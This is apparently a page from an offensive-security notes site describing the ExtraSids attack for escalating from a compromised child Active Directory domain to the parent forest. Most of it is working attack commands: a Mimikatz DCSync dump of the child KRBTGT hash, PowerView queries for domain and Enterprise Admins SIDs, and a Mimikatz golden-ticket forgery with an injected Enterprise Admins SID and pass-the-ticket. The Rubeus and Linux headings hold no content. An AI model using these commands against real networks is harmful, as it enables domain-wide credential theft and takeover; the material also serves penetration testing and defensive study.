search

Child -> Parent Trusts

hashtag
Windows

hashtag
ExtraSids Attack - Mimikatz

To perform this attack after compromising a child domain, we need the following:

  • The KRBTGT hash for the child domain

  • The SID for the child domain

  • The name of a target user in the child domain (does not need to exist!)

  • The FQDN of the child domain.

  • The SID of the Enterprise Admins group of the root domain.

  • With this data collected, the attack can be performed with Mimikatz.

# Obtaining the KRBTGT Account's NT Hash using Mimikatz, which also gives SID
PS C:\>  mimikatz # lsadump::dcsync /user:LOGISTICS\\krbtgt

# alternative to get SID using PowerView
Get-DomainSID

# Obtaining Enterprise Admins Group's SID using Get-DomainGroup from PowerView
Get-DomainGroup -Domain DOMAIN.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

# Or using cmdlet  
Get-ADGroup -Identity "Enterprise Admins" -Server "DOMAIN.LOCAL".

# Creating a Golden Ticket with Mimikatz
mimikatz # kerberos::golden /user:hacker /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Checking if Golden ticket for non existant user hacker is residing in memory
klist

ExtraSids Attack - Rubeus

hashtag
Linux

PreviousEnumerating Trust RelationshipsNextCross-Forest Trust Abuse

Last updated